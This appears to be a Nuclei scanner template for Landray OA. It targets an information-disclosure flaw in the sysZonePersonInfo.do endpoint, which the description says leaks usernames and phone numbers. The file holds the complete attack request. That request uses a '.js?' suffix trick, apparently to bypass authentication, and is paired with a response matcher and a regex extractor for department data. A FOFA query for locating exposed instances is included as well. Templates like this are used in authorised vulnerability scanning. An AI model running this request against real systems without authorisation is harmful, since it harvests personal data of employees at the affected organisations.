id: landray-oa-sysZonePersonInfo-disclosure
info:
  name: 蓝凌 OA sysZonePersonInfo.do - disclosure
  author: leadlife
  severity: high
  description: 蓝凌-OA在/sys/zone/sys_zone_personInfo/sysZonePersonInfo.do存在敏感信息泄露漏洞，会泄露用户名和手机号等信息
  reference:
    - todo
  metadata:
    verified: true
    max-request: 1
    fofa-query : app='Landray-OA系统'
  tags: landray,disclosure,oa


http:
  - raw:
      - |
        GET /sys/zone/sys_zone_personInfo/sysZonePersonInfo.do?.js?&method=searchPerson&orderby&ordertype=up&rowsize=5&s_ajax=true HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"columns","title","property")

    extractors:
      - type: regex
        part: body_1
        group: 1
        regex:
          - \{"col":"fdDept","value":"([^"]*)"\}